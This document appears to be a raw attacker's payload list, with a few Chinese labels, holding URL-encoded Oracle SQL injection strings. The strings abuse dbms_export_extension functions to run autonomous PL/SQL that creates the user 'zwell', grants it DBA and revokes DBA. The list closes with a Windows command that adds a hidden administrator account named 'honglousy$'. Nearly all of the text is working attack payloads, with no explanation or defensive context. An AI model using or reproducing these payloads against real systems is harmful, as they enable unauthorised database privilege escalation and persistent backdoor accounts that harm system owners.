%20and%200=sys.dbms_export_extension.get_domain_index_metadata(chr(65)%7C%7Cchr(49),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(77)%7C%7Cchr(89)%7C%7Cchr(66)%7C%7Cchr(65)%7C%7Cchr(68)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(75)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(69),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(49)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(67)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(69)%7C%7Cchr(82)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(70)%7C%7Cchr(73)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(32)%7C%7Cchr(66)%7C%7Cchr(89)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(49),0)%20and%201=1

%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(67)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(69)%7C%7Cchr(82)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(70)%7C%7Cchr(73)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(32)%7C%7Cchr(66)%7C%7Cchr(89)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(13)%7C%7Cchr(10)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1


提权为dba：
grant dba to zwell
一：
%20and%200=sys.dbms_export_extension.get_domain_index_metadata(chr(65)%7C%7Cchr(49),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(77)%7C%7Cchr(89)%7C%7Cchr(66)%7C%7Cchr(65)%7C%7Cchr(68)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(75)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(69),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(49)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(49),0)%20and%201=1


%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1
二：

%20and%200=sys.dbms_export_extension.get_domain_index_metadata(chr(65)%7C%7Cchr(49),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(77)%7C%7Cchr(89)%7C%7Cchr(66)%7C%7Cchr(65)%7C%7Cchr(68)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(75)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(69),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(49)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48)%7C%7Cchr(46)%7C%7Cchr(50)%7C%7Cchr(46)%7C%7Cchr(48),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(118)%7C%7Cchr(111)%7C%7Cchr(107)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(109)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(49),0)%20and%201=1



%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(118)%7C%7Cchr(111)%7C%7Cchr(107)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(109)%7C%7Cchr(32)%7C%7Cchr(122)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1


----------------------------------------------------------------------------------------
cmd /c net user honglousy$ yanhua /add&net localgroup administrators honglousy$ /add














































































